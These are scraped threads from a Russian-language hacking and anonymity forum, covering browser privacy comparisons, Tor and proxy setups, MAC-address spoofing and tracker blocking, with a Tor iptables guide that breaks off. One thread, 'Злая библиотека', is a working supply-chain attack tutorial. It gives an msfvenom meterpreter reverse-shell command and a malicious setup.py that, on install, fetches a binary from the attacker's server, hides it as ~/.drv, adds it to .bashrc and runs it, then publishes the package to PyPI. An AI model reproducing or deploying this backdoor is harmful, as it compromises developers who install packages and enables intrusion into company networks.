Форк старой версии расширения Stylish, до того как [оно стало шпионским ПО](https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your- internet-history/) [(архив)](https://web.archive.org/web/20181025140805/https://robertheaton.com/2018/07/02/stylish- browser-extension-steals-your-internet-history/). Это расширение позволит вам создать персональный файл CSS для любого посещаемого сайта, и использовать его когда вам угодно. Можете проверить его работу, загрузив стили для этого сайта на моей главной странице. Просто нажмите на имя темы, скопируйте содержимое, щёлкните по значку Stylus и выберите "Записать стиль для digdeeper.neocities.org ". Затем вставьте туда код CSS и нажмите Сохранить. Теперь снова посетите мой сайт, и вы увидите что его внешний вид изменился; вы можете установить все стили сразу, а затем выбрать любой из них в любое время. Очень удобно и поддерживается браузерами семейств Chrome и Firefox (для Pale Moon есть форк Stylem). Расширение даже можно использовать для удаления рекламы, с которой не может справиться даже uMatrix (путём скрытия элементов). Например, текстовая реклама на StartPage может быть заблокирована этим стилем:

@namespace url(http://www.w3.org/1999/xhtml);
@-moz-document domain("startpage.com") {
#adBlock {
display:none;
}
}

Click to expand...

Как выбрать браузер для повседневного использования?

ID: 676533bbb4103b69df371d50
Thread ID: 29568
Created: 2019-05-30T09:47:19+0000
Last Post: 2019-05-30T09:47:19+0000
Author: bbuhBby8&b&BN
Replies: 0 Views: 2K

Вступление
Начнём с самого главного. Для чего нужен браузер? Изначальное его предназначение - просмотр HTML-документов. Но за историю своего существования Интернет изменился настолько, что к современным браузерам теперь предъявляется больше требований. Простые браузеры, работающие в командной строке - links, w3m, Lynx, elinks - могут использоваться и сегодня для просмотра сайтов в строго текстовом режиме. На самом деле, elinks даже поддерживает функции, которых почему-то нет в «современных» веб-браузерах: редактирование куки, пользовательские стили и настройку горячих клавиш. Но выходит так, что весь этот функционал можно вернуть и с помощью расширений. Максимум 256 цветов, никаких изображений, отсутствующая или неполная поддержка Javascript, ограниченная поддержка CSS, невозможность загрузки не-HTML содержимого вроде видео (но есть возможность внешней загрузки), а также полное отсутствие расширений не позволяют использовать эти программы для прогулки по современному киберпространству.
Можно упомянуть и многие другие браузеры. Surf - графический браузер с поддержкой изображений и Javascript, но не имеющий вкладок и пользовательского интерфейса как такового. У Midori есть всё, что можно ожидать от современного веб-браузера, включая даже встроенный функционал, заменяющий некоторые популярные расширения - но этого недостаточно. Otter Browser - многообещающий проект с очень удобным пользовательским интерфейсом, но пока без поддержки расширений (хотя это входит в планы автора). Qutebrowser управляется клавиатурой и недавно включил поддержку настроек для отдельных доменов, но они всё равно уступают uMatrix. Многие из его функций можно заменить, опять же, расширениями.
Одно из преимуществ этого класса «независимых» браузеров заключается в том, что они за вами не следят. Но, перепробовав практически все из них, я также выяснил, что в конце концов, расширения необходимы - особенно это касается uMatrix. Поэтому для каждодневного использования нужно выбрать браузер, основанный на Firefox или Chrome. Поскольку поддержка расширений у них в целом одинакова (за исключением Pale Moon), мы должны выбрать другие критерии для их сравнения. Таковыми будут удобство использования, конфиденциальность, настраиваемость, взгляды разработчиков и их отношение к пользователю, внешний вид и скорость. Перейдём к анализу каждого из них:
Браузеры на основе Firefox
Mozilla Firefox
Этот браузер уже в течение долгого времени активно работает против конечного пользователя - масштабы урона настолько велики, что мне пришлось написать отдельную, огромную статью, изобличающую этот и многие другие грешки компании Mozilla. Говоря кратко, сюда входят систематическое удаление важных возможностей по настройке программы, анти- конфиденциальные поисковики по умолчанию, ложные заявления о «приватности» браузера, ликвидация поддержки некоторых расширений, неуважение труда собственных волонтёров, подсовывание пользователям «нацеленной» на них рекламы, принуждение к использованию определённого ПО и многое, многое другое (прочитайте статью!). Добавьте к этому тормоза и откровенно говённый интерфейс - и совершенно ясно, что перед вами браузер, пользоваться которым вы не будете никогда.
GNU IceCat
Ответвление от браузера Firefox, созданное Фондом свободного программного обеспечения - с большим упором на фритардство. Из-за этого здесь нет поддержки Flash, зато есть надоедливое расширение LibreJS, включённое по умолчанию. В старых версиях было шпионское ПО, но, насколько мне известно, в версии 60.2 от него окончательно избавились. По умолчанию в браузер включены некоторые расширения, улучшающие конфиденциальность, но я всё же советую вам использовать uMatrix - хотя новичкам может понравиться встроенный функционал. Несмотря на то, что над IceCat работают люди с определёнными убеждениями, программа по-прежнему страдает от многих проблем Firefox'а - отвратительного интерфейса, тормозов, невозможности тонкой настройки, прекращённой поддержки расширений и пр. В итоге, GNU IceCat оставляет в себе много изъянов, унаследованных от Firefox, исправляя лишь небольшую их часть - а по-другому и быть не может, поскольку они фактически целиком зависимы от решений, принимаемых Mozilla.
Librefox
Будучи свежим прибавлением в семействе, Librefox по отношению к Firefox примерно то же, что и Ungoogled-Chromium для Chrome. Браузер появился совсем недавно, и ещё не имеет официального релиза и даже своего логотипа - только несколько конфигурационных файлов. Как отмечает разработчик, Librefox также полностью зависим от Mozilla: Обновили браузер - поскольку проект не является ответвлением, программа обновляется в соответствии с последней версией Firefox. Поэтому данный браузер не добавит ничего нового по сравнению с обычным Firefox, кроме улучшенной конфиденциальности. Кроме того, файлы user.js отменят все ваши изменения настроек , так что ваша свобода будет всё равно ограничена. Если вас это не пугает, выбор в целом неплохой. Но, разумеется, есть варианты получше.
Waterfox
Ещё один браузер, [притворяющийся конфиденциальным](https://www.waterfoxproject.org/en- US/waterfox/features/private-browsing/) [(архив)](https://web.archive.org/web/20181012154532/https://www.waterfoxproject.org/en- US/waterfox/features/private-browsing/) - Мы поглощены заботой о вашей конфиденциальности. Поэтому мы сделали Режим Инкогнито в Waterfox ещё мощнее, чем у конкурентов, когда на самом деле Waterfox не делает вообще ничего для защиты частной жизни и даже шпионит за вами почти так же, как Firefox (архив) (программа сделала 109 скрытых запросов когда я запустил её впервые). Более мощный Режим Инкогнито - тоже враньё, потому что любой, кто ценит неприкосновенность своей частной жизни, не будет полагаться на это, а установит важнейшие расширения, повышающие конфиденциальность. Поэтому обманчивые заявления этого разработчика созданы только для привлечения пользователей-новичков. Несмотря на поддержку старых расширений типа XUL (в отличие от Firefox), всё остальное в этом браузере плохо, и он даже не стремится избавиться от слежки за вами. Так что лучше пройти мимо этого подозрительного разработчика и его «творения».
Итог
Firefox абсолютно ужасен, и основанные на нём проекты, как видно, тоже оставляют желать лучшего. Хотя некоторые из них действительно избавились (полностью или частично) от слежки за пользователями, они не борются с другого рода проблемами, и даже добавляют свои - например, ликвидацию поддержки Flash в IceCat, или зависимость от конфигурационных файлов в Librefox. Посмотрим, смогут ли проекты, основанные на Chrome, предложить нам что-нибудь лучше:
Браузеры на основе Chrome
Google Chrome
Громадная кампания, целиком посвящённая сбору ваших личных данных (архив)... Но, по крайней мере, они не изображают из себя что-то ещё, как это делает Firefox. Тошнотворный «современный» интерфейс (подобно Firefox), очень мало настроек (нет даже возможности настроить прокси), крайне урезанный функционал, тормоза, зависимость от злобной корпорации Google... Остерегайтесь как чумы.
Iridium Browser
Позиционируя себя как БРАУЗЕР, ОБЕСПЕЧИВАЮЩИЙ КОНФИДЕНЦИАЛЬНОСТЬ. И ТОЧКА., он в действительности соответствует своим заявлениям... помимо одной маленькой детали (архив). Функция Google SafeBrowsing включена по умолчанию, что означает периодические соединения с Google - но опцию легко отключить. Над Iridium работает очень маленькая группа людей, и браузер давно не обновлялся (с ноября 2018 - прошло больше трёх месяцев к моменту написания этой статьи). Я пользовался этим браузером долгое время (пока не нашёл следующий в списке), но он не может похвастаться чем-то ещё помимо улучшенной конфиденциальности. Вообще, он почти неотличим от Chrome помимо указанного выше, и так же целиком зависит от решений Google. Поэтому больше я его не рекомендую.
Ungoogled- chromium
На 100% «разгугленный» форк Chrome, этот браузер даже блокирует соединения в веб-магазином Chrome и не позволяет включить функции, которые могут спровоцировать утечку данных в Google. Проект активно развивается. Использовал ещё дольше, чем Iridium - но и этот браузер не заботится о чём-то, кроме приватности. Он всё равно не освободит вас от оков Google.
Brave Browser
Этот браузер стал известен благодаря встроенным мерам защиты конфиденциальности - таким как AdBlock, HTTPS Everywhere и блокировщику скриптов - но их всех превосходит uMatrix. Более того, после проверки на практике, я могу с уверенностью сказать, что их «щиты» довольно бесполезны - большинство отслеживающих скриптов не блокируется вовсе, а на отдельных сайтах сотни таких скриптов остаются абсолютно нетронутыми. Блокировка скриптов просто отключает JavaScript – это лишь заново изобретённый NoScript. Раньше добавить расширения в Brave можно было только заглянув в исходный код, но сейчас появилась их полная поддержка, сравнимая с другими браузерами на Chrome. Несмотря на это, программа не только сама отслеживает ваши действия (архив), но ещё и активно старается испортить вашу конфиденциальность, разрешая слежку за вами со стороны Facebook и Twitter. Brave также собирает пожертвования от имени других людей без их согласия!

Здесь вы можете узнать больше о проблеме. Похоже, что реальная цель существования этого браузера - это их опциональная программа Brave Payments, позволяющая вам жертвовать средства для сайтов, просматривая при этом рекламу от Brave вместо обычных баннеров от «третьей стороны». Возможно, что это благородная идея, но, по моему мнению, в капиталистическом интернете, полном рекламы, уже нет никакого смысла. Brave обманным путём пытается впарить и оправдать то дерьмо, которым они занимаются. Браузер отличают несколько более удобный интерфейс и сравнительно большая свобода настроек (куда входит огромное количество поисковых систем, включённых по умолчанию). Избегайте, если только вам не нравится по каким-то причинам программа Brave Payments.
Opera
В прошлом имела собственный движок и высоко ценилась пользователями. Но после перехода на движок Blink (используемый Chrome), функционал был сильно урезан, что оставило волны недовольных пользователей. Несколькими годами позже её купила одна китайская компания, вбившая последний гвоздь в гроб этого браузера. Забудьте о маркетинговом вранье вроде Теперь со встроенным блокировщиком рекламы, экономией батареи и бесплатным VPN.Opera усердно шпионит за вами (архив), включая всю вашу историю посещения сайтов. По умолчанию интегрируется с такими программами слежки как Facebook, WhatsApp (которым владеет FB) и Telegram (который абсолютно ненадёжен, как говорят специалисты по шифрованию). VPN скорее всего представляет собой китайскую ловушку, а любой блокировщик рекламы не сравнится с uMatrix. Несмотря на некоторые полезные функции, такие как жесты мышью или автоконвертёр валют, нет особого смысла использовать «новую» Оперу вместо других проектов на Chrome. Обходите стороной.
Vivaldi
Создан разработчиками старых версий Opera, разочарованными направлением, в котором стал двигаться браузер. Наверно, имеет самый полный встроенный функционал. Однако, он также бессовестно следит за вами (архив) (например, через аналитику Matomo). Разработчики отрицают наличие проблем с приватностью и открыто поносят пользователей, которые пытаются говорить об этом. Но большое количество функций (жесты мышью, скриншоты, веб-панели, заметки...) и широкие возможности настройки браузера (относительно вкладок, закладок, горячих клавиш - чего нет ни в одном другом браузере...) делают Vivaldi неплохим выбором.
Итог
Ситуация с форками Chrome выглядит лучше, чем с Firefox - здесь их больше, и они чаще обновляются. Имеется больше разнообразия в функционале, расширениях по умолчанию, внешнем виде, убеждениях разработчиков и т. д. Но кажется, что чего-то не хватает. У браузеров с широким функционалом имеются свои проблемы - встроенное шпионское ПО, лохотрон, беспринципность, ещё большие тормоза или даже вылеты на рабочий стол. У тех, что не следят за пользователями, нет новых функций и улучшений. И все они построены на движке Blink (и следовательно зависят от Google). Неужели это всё? Неужели выбирать придётся только между Vivaldi, Ungoogled-Chromium, Librefox и IceCat?
Альтернатива
К счастью, существует браузер, который не только лишён проблем вышеперечисленных программ, но и имеет значительное превосходство над ними в функционале, скорости, настраиваемости, внешнем виде и философии разработки. И не только - он ещё и противостоит тирании Google и Mozilla. Это браузер настоящего мятежника. Хочу сказать, что сначала я был обманут первым впечатлением, поскольку отбирал браузеры по критерию слежки за пользователями (где идеал - её отсутствие, а всё остальное - повод дать красный свет), а uMatrix (самое важное расширение) ещё не поддерживалось. Но я увидел истину, и осознал, что прямо перед носом у нас находится настоящее сокровище. Без лишних слов, представляю вам...
Pale Moon
Ответвление от старой версии Firefox, впоследствии развившееся в браузер с самостоятельным, независимым движком - в отличие от всех остальных, перечисленных выше. Графический интерфейс «родной» и примет вашу системную (GTK2) тему. Если вы читали мою статью о неудачном дизайне приложений, вам будет интересно знать, что в Pale Moon совсем нет нагромождённых или бесполезных меню , так распространённых в современном ПО. У браузера замечательный, классический «олдскульный» вид, встречающийся также в Geany и Claws Mail. Стандартный набор функций и настроек намного превосходит любой другой браузер (за исключением, пожалуй, Vivaldi), и вы можете получить ещё большую свободу, установив расширение Pale Moon Commander, добавляющее продвинутые настройки. Pale Moon поддерживает расширения с архитектурой XUL (более не поддерживаемые Mozilla), а также созданные специально для него аддоны. А Moon Tester Tool даже позволяет установку расширений, предназначенных для более ранних или поздних версий браузера - и вы вполне можете выяснить, что они всё равно работают. Видите? Pale Moon действительно знает, что такое тонкая настройка. Хотя аддоны типа WebExtensions не поддерживаются, большинству из них есть свой эквивалент (в то время как Firefox уже никогда не будет поддерживать расширения старого типа). Другой способ настроить Pale Moon «под себя» - это темы оформления, которые можно создавать самому или выбрать из множества доступных на официальном сайте. Браузер намного, в разы быстрее чем почти все остальные, несмотря на обилие функций. Так что же... есть ли у Pale Moon свои недостатки? Конечно, они глупо поступили, заблокировав расширение AdNauseam (хотя вы всё равно сможете его установить, если хотите), и в браузере также есть элементы слежки - (большинство из которых легко обойти, изменив домашнюю страницу), но поверьте, эти небольшие изъяны не сводят на нет его очевидное превосходство. В самом деле, невозможно найти что-то ещё лучше.
Вывод
Победителем выходит Pale Moon! Fatality! Ну, IceCat, Vivaldi, и Ungoogled- Chromium всё же достаточно хороши и имеют некоторые преимущества над Pale Moon. Но только последний полностью независим от крупных корпораций , и имеет столько достоинств, описанных выше. Можно подождать, пока Otter или QuteBrowser не наберут необходимый функционал, но на сегодня для меня нет другого браузера помимо Pale Moon - и я сомневаюсь, что когда-нибудь будет, даже если два вышеупомянутых станут поддерживать расширения. Мы победили в битве за идеальный браузер и можем наконец возрадоваться!

Анонимный роутер из любого роутера (Tor, SSH, Socks5)

ID: 676533bbb4103b69df371d58
Thread ID: 28067
Created: 2019-02-27T19:57:02+0000
Last Post: 2019-05-03T07:00:13+0000
Author: tabac
Replies: 2 Views: 2K

Вся сборка состоит из ноутбука + роутера.
Ноутбук выполняет программную роль роутера, а роутер это железо которое раздает интернет по Wi-FI или Ethernet кабелю

Дли примера я возьму обычный роутер xiaomi nano (Он маленький, его можно запитать от USB и он раздает интернет как по Wi-FI так и Ethernet кабелю.)

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanrouter%2F1.jpg&hash=e65e3e46f82f30f2b11378fcb852a153)

+ нам понадобится Ethernet кабель для того чтобы подключить данный роутер к ноутбуку

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F5.jpg&hash=da502d93d25622663c9c2916b33f27f2)

стандартные действия для любого роутера: Нажму Reset в самом роутере чтобы сбросить все на заводские настройки. Подключусь по дефолтной сети Wi-FI к точке и задам имя Wi-Fi сети и пароль.

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanrouter%2F2.jpg&hash=cb1efaea43f525b86fc388fce7515d58)

Теперь все это подключу к (компьютеру/ноутбуку)

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanrouter%2F3.jpg&hash=b833d76cf7af7c0d85962e080ae2c8fd)

Программная Часть: Софт который будет раздавать (анонимный интернет на наш роутер!)
Double SSH Tunnel Manager

Скачиваем программу Double SSH Tunnel Manager, распаковываем и запускаем!
Программа предложит вам установить Виртуальный адаптер, соглашаемся! после чего в списке адаптеров у вас появится примерно следующая картина.

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F2.jpg&hash=07815b23cd301c66505fbcf69e7bba39)

далее с этих двух адаптеров убираем все галочки

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F3.jpg&hash=6b8dbc79a925f22df14a5bb71bdfddac)

теперь нам нужно эти 2 адаптера объединить в мост и настроить этот мост убрав галочки с IP4 и IP6

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F4.jpg&hash=cfa06f741c45f8952698b4a780dab722)

На этом все !!! настройки закончены после подключения к анонимной сети все будет раздаваться через наш роутер !!![/B]

Ответы на вопросы:

**Какую анонимную сеть можно подключить?

-Самое простое это подключить TOR network для этого менеджер должен быть подключен к сети Tor и тебе нужно направить ползунок вниз.

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F6.jpg&hash=6a4a782d4ca61c41d3754758df30827a)

Как подключить Socks5, SSH, Socks5 Back-connect, TorOnionSocks, LocalSocks5, ShadowSocks?

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F7.jpg&hash=4fec1ae6113468526e61811047ef7355)

Можно ли использовать различные цепочки соединений ?
-Можно в качестве первого соединения подключить Tor, Socks5, SSH, Socks5 Back-connect, LocalSocks5, ShadowSocks, в качестве второй цепи использовать ssh, socks5.

Можно ли использовать VPN ?
-Да. можно... (для этого в программе используйте VPN monitor, туда нужно будет прописать IP вашего VPN)

WebRTC каков будет высвечиваться на whoer.net и подобных сайтах.
-Любой браузер из коробки будет показывать WebRTC вашего Socks или SSH.

Сайт 2ip.ru/privacy/ определяют пинг и говорят что это туннель либо прокси?
-Некоторое сайты могут определить вас по тайм задержке пример 2ip.ru/privacy/
для того чтобы этого не было воспользуйтесь функцией AntiPing
(AntiPing замедляет работу поэтому не забывайте возвращать ползунок в исходное положение)

![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fanroz2%2F8.jpg&hash=d720ce4c53a805c2687e36fdc68a42b3)

Я все настройки сделал правильно. но после подключения пишет "Неопознанная сеть"
-Вам нужно еще раз проверить все настройки. после чего обязательно перезагрузить OS.

Будет ли менять программа DNS на главном компьютере?
-Нет не будет. DNS меняется только для вашего роутера.

Если остались какие-то вопросы, то вы всегда можете задать их

Telegram: @ssh_manager**

Помогите с Tails...

ID: 676533bbb4103b69df371d5b
Thread ID: 28197
Created: 2019-03-08T22:27:15+0000
Last Post: 2019-04-24T14:57:55+0000
Author: ThomasRR
Replies: 4 Views: 2K

Шел третий день в попытках подключить tails к интернету
Это в теории хоть реально?
Ви-фи нет, подключен на прямую интернет-кабель
Почему этот ебан#й tails не может у нему подключиться никак? Хотя обсалютно все говорят что проблем не должно быть с этим. Пробовал и отменять подмену mac результат тот же.
Если отключить IPv4 и IPv6 то сразу подключается, но что толку если интернета в таком случае все равно нет...
Что делать?
Ни у кого данной проблемы чтоль не было?

Portable Proxy Checker

ID: 676533bbb4103b69df371d5d
Thread ID: 25194
Created: 2014-05-18T11:36:13+0000
Last Post: 2019-04-18T09:25:52+0000
Author: vvs777
Replies: 1 Views: 2K

Portable Proxy Checker (PPC xD)

Привет всем кто меня помнит
Версия третья, исправленная и дополненная.

Скачать (запакован UPX)

Преимущества - скорость.

Обязательные параметры командной строки:
1. Файл со списком прокси адрес:порт, разделенными переводом строки Windows \r\n
2. Файл куда будут записаны хорошие прокси
Дополнительные параметры:
3. Таймаут в миллисекундах, целое число
4. Дополнительные параметры -connect -socks

Например,

pcheck source.txt checked.txt
pcheck source.txt checked.txt 5000
pcheck source.txt checked.txt 5000 -connect
pcheck source.txt checked.txt 5000 -connect -socks

Click to expand...

-connect проверяет прокси методом connect (т.е. HTTPS прокси), если метод не работает - проверяет на обычный
-socks проверяет прокси на socks5, если ответ невалидный - проверяет как обычный прокси
Оба параметра сразу используются если в прокси-листе салат из всего подряд.

Пользуйтесь на здоровье! Скоро обновлю еще много чего из своих старых разработок.

С ув. VVS777

Tor_Proxifier Portable v1.2

ID: 676533bbb4103b69df371d5e
Thread ID: 28292
Created: 2019-03-15T05:19:05+0000
Last Post: 2019-04-18T09:05:48+0000
Author: CEEED777
Replies: 1 Views: 2K

Официальный сайт: [Ru.Board](http://forum.ru- board.com/topic.cgi?forum=2&topic=5559&start=2060)

Надстройка над Proxifier (http://www.proxifier.com/documentation/v3/), имеет уже настроенные два профиля:
Direct - сеть работает как обычно
TOR - все сетевые соединения идут через TOR.

СКАЧАТЬ / DOWNLOAD

Ищю чит на war thunder желательно только вх

ID: 676533bbb4103b69df371d60
Thread ID: 28567
Created: 2019-04-02T17:45:46+0000
Last Post: 2019-04-11T07:55:54+0000
Author: Silvood
Replies: 2 Views: 2K

Ищю чит вх на war thunder

Сбор хостов трекеров, счетчиков посетителей итд для блокирования

ID: 676533bbb4103b69df371d61
Thread ID: 28640
Created: 2019-04-07T16:41:45+0000
Last Post: 2019-04-07T16:41:45+0000
Author: lukmus
Replies: 0 Views: 2K

Проект StopWatchingForUs предназначен для сбора, с последующей блокировкой, хостов трекеров пользователей, счетчиков и других адресов, которые созданы интернет-гигантами (и не только) для сбора и анализа посетителей сайтов.

Проект некоммерческий. Сайт не продается и ничего не покупает. Все представленные на сайте скрипты и базы хостов открыты, свободны для пополнения и бесплатны.

Думаю, многие знают на что способны Яндекс.Метрика и Google Analytics, при этом далеко не факт, что вебмастеру, который установил на своем сайте счетчик, показываются все его возможности и все полученные и проанализированные данные о посетителе.

Я предлагаю собирать такие хосты на сайте и блокировать штатными средствами ОС (не надо ничего устанавливать) путем занесения в hosts-файл под несуществующий IP-адрес. Помимо базы таких хостов, на сайте также имеются автоматически сгенерированные скрипты для Windows, Linux и MacOS.

Подробнее о проекте на самом сайте: http://stopwatchingfor.us/ru#what-is-it
Больше инфы в моем блоге: http://blog.lukmus.ru/2019/01/04/stopwatchingforus/

p.s. надеюсь сообщество XSS примет участие в сборе хостов, не только если вдруг случайно кого-нибудь охватит приступ паранойи

Подмена МАС-адреса

ID: 676533bbb4103b69df371d80
Thread ID: 27236
Created: 2019-01-10T22:14:10+0000
Last Post: 2019-01-10T22:14:10+0000
Author: zxc21
Replies: 0 Views: 2K

Разовая замена

Узнаём текущий МАС

$ /sbin/ifconfig | grep HWaddr

enp5s1 Link encap:Ethernet HWaddr 00:1b:1с:сd:af:ec

Для одноразового смена мас-адреса просто вбить в терминал:

$ sudo ifconfig enp5s1 down

$ sudo ifconfig enp5s1 hw ether e2:0c:b6:44:b6:eb // прописываем любой мас

$ sudo ifconfig enp5s1 up

Проверяем

$ /sbin/ifconfig | grep HWaddr

enp5s1 Link encap:Ethernet HWaddr e2:0c:b6:44:b6:eb

Разовая замена при помощи macchanger

$ sudo apt install macchanger

$ sudo ifconfig enp5s1 down

$ sudo macchanger -r enp5s1

Current MAC: e2:0c:b6:44:b6:eb (unknown)

Permanent MAC: 00:1b:1с:сd:af:ec (TP-Link Corporation)

New MAC: de:f9:5c:4c:a7:5b (unknown)

$ sudo ifconfig enp5s1 up

Проверяем

$ /sbin/ifconfig | grep HWaddr
enp5s1 Link encap:Ethernet HWaddr de:f9:5c:4c:a7:5b

Смена адреса при каждой загрузке

Открываем скрипт /etc/network/if-pre-up.d/macchanger

$ sudo gedit /etc/network/if-pre-up.d/macchanger

В самой нижней строке /usr/bin/${package} -e $IFACE >> $LOGFILE 2>&1
Меняем е на r

/usr/bin/${package} -r $IFACE >> $LOGFILE 2>&1

Теперь при загрузке системы все сетевые интерфейсы будут иметь не повторяющиеся случайные адреса.

Злая библиотека

ID: 676533bbb4103b69df371d82
Thread ID: 27175
Created: 2019-01-07T08:25:25+0000
Last Post: 2019-01-07T08:25:25+0000
Author: aliva
Replies: 0 Views: 2K

**Всем привет!
**
Сегодня я бы хотела поделиться с вами методом получения отправной точки в сеть какого-либо предприятия. Приступим!

**С чем мы имеем дело?
**
Слышали ли вы когда нибудь о PyPI, NPM или NuGet?

Я думаю, что хоть кто нибудь хотя бы одно из этого знает. Так вот, все это - репозитории с библиотеками или просто пакетами (утилитами например), написанными на том или ином языке. Например PyPI (Python Package Index) - это репозитории с python пакетами, которые публикует непосредственно само сообщество. Залить пакет туда может кто угодно и они никак толком не проверяются, чем собственно злоумышленник и может воспользоваться.

Сегодня мы создадим библиотеку для PyPI, которая при установке будет устанавливать в систему бекдор. Мы будем ориентироваться только на Linux системы в данном примере, так как кому надо - тот сделает это мультиплатформенным. Поехали!

**Как устроен PyPI пакет?
**
PyPI пакет представляет из себя обычный tar.gz архив, в котором хранятся метаданные пакета (README например), сам код (.py), дополнительные данные (например в случае с python-geoip это GeoIP.dat (то есть сама база данных GeoIP)) и установочный скрипт (setup.py). Именно установочный скрипт будет нам интересен!

Что мы будем делать?

Мы добавим перед выполнением функции setup (), которая является частью setuptools, добавим код, который как раз и будет ставить бекдор.

Для начала давайте создадим сам бекдор. Я не буду сильно заморачиваться и сделаю это при помощи Metasploit.

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=IP_ВАШЕГО_СЕРВЕРА_С_METASPLOIT LPORT=4444 -f elf -o /var/www/html

**Создаем сам пакет
**
Для этого нужно установить утилиту twine, при помощи которой мы и будем заливать пакеты (клиент для PyPI). Пишем:

pip install twine

Далее создаем конфиг для твайна. Для этого нужно создать файл .pypirc в домашней дериктории.

touch ~/.pypirc

Далее откроем его и запишем туда конфиг:

Code:Copy to clipboard

[pypi] username=ВАШ_ЛОГИН_ОТ_PYPI password=ВАШ_ПАРОЛЬ_ОТ_PYPI

Далее создаем папку с пакетом:
mkdir evil_library

В ней нам нужно создать папку с самим пакетом
mkdir evilpackage

И создать в ней файл init.py, далее можно ничего не трогать в этой папке. Вернемся к evil_library.
Создаем файл setup.cfg, в котором мы запишем установочные конфигурации.

Code:Copy to clipboard

[metadata] description-file = README.md [bdist_wheel] universal=1

universal=1 - пакет годен для всех версий Python
description-file - указание файла с описанием пакета (у меня без него twine не хотел работать)
Далее создайте файл README.md
Его можно оставить пустым.

Создаем сам установочный скрипт setup.py

Пишем в него:

Code:Copy to clipboard

setup( name = 'my_evil_library', packages = find_packages (), version = '0.1', description = 'I will hack you :3', author = 'Nobody', url = 'http://example.com', keywords = ['keyword?'], classifiers = [] )

В name укажите имя (будет pip install имя), версию и тд
Далее собираем пакет в архив.
python ./setup.py sdist

После успешного выполнения у вас в папке evil_library должна появится папка dist, в которой и будет лежать архив.
Распакуем его:
tar -xvf архив.tar.gz

Перейдем в распакованную папку.

Открываем файлик setup.py и до вызова функции setup () пишем вот этот код:

Python:Copy to clipboard

def rn(): import platform, os, stat s = False try: import urllib2 except ImportError: import http.client s = True PATH = "/out" IP = "IP_ВАШЕГО_СЕРВЕРА" LOC = ".drv" if platform.system() == "Linux": if not s: response = urllib2.urlopen("http://" + IP + PATH).read() else: connection = http.client.HTTPConnection(IP) connection.request("GET", PATH) response = connection.getresponse().read() os.chdir(os.path.expanduser("~")) d = open(LOC, "wb") d.write(response) d.close() current_state = os.stat(LOC) os.chmod(LOC, current_state.st_mode | stat.S_IEXEC) brc = open(".bashrc", "a") brc.write("\n~/.drv &") brc.close() os.system("~/.drv") else: print("Error installing library!") exit(-1) rn()

Этот код проверяет, на какой системе он запущен и если это Linux, то скачивает с вашего сервера бинарник, кидает его в домашнюю директорию в виде скрытого файла .drv, задает ему права на исполнение и прописывает в .bashrc его запуск.

Сохраняем setup.py

У вас должно получится примерно такое:

Далее обратно пакуем всю папку.

Пишем tar -zvfc имя_архива имя_папки

Далее можно удалить эту папку.

Теперь нам осталось лишь отправить пакет на PyPI.

Пишем:
twine upload архив.tar.gz

Готово!

Мы сделали вставку кода не сразу, потому что twine бы ругался и не создавал бы пакет.

Так же можно склеить это с уже готовой библиотекой.
Осталось лишь, чтобы жертва установила наш пакет!
Тоже самое можно проделывать и с NPM, Gem, NuGet и тд

Программист - неплохая точка для входа в сеть компании или проникновения на продакшн сервер

Спасибо за внимание!

Проксируем систему через Tor

ID: 676533bbb4103b69df371d83
Thread ID: 27146
Created: 2019-01-04T20:25:24+0000
Last Post: 2019-01-05T07:12:47+0000
Author: zxc21
Replies: 3 Views: 2K

Всем Добра уважаемые xss-users!

Толи паранойя меня зашкаливает, толи паранойя просто *опа как зашкаливает :smile46:
Конкурс я уже продинамил, но не в деньгах счастье.
Решил набрать много букв на тему Tor'a, черпал на сколько умею тут , но буржуйский у меня на 2+ поэтому решил своими словами изложить.
Попробую расписать о методе настройки через политики iptables

Настройка iptables:

Установка самого tor'a (не путать с tor-browser).

Редактирование файла конфига tor'a.

Запрет NetworkManager'у сувать своё жало туда, куда он его суёт по дефолту.

Настройка политик iptables

Отключение политик

Spoiler: Буквы и картинки

Тут нам для начала понадобится установить сам tor

$ sudo apt install tor

Редактируем файл настроек тора torrc

$ sudo nano /etc/tor/torrc

В начало или в конец файла дописываем:

PHP:Copy to clipboard

VirtualAddrNetworkIPv4 10.192.0.0/10 AutomapHostsOnResolve 1 TransPort 9040 DNSPort 5353

В принципе эта шляпа запускает собственный DNS-сервер и все dns-запросы уже идут через него,
также открывает порт, через который весь трафик будет гоняться.
Для чего нужна самая первая строка - затрудняюсь сказать.

Перезагружаем тоr:
$ sudo service tor restart

Удаляем файл /etc/resolv.conf , так как часто это симлинк:

$ sudo rm -f /etc/resolv.conf

и создадим новый:
$ sudo echo "nameserver 127.0.0.1" > /etc/resolv.conf

Запрещаем NetworkManager'u совать руки в файл resolv.conf.

Либо можно тупо залочить файл resolv.conf
$ sudo chattr +i /etc/resolv.conf

либо по пути /etc/NetworkManager/conf.d/ создать файл dns.conf и прописываем в него:

Bash:Copy to clipboard

[main] dns=none

Создаём в домашней директории файл iptables.sh и заполняем его новыми правилами, в принципе из инглиша я думаю понятно что за что отвечает, если я напишу ещё хуже будет )

PHP:Copy to clipboard

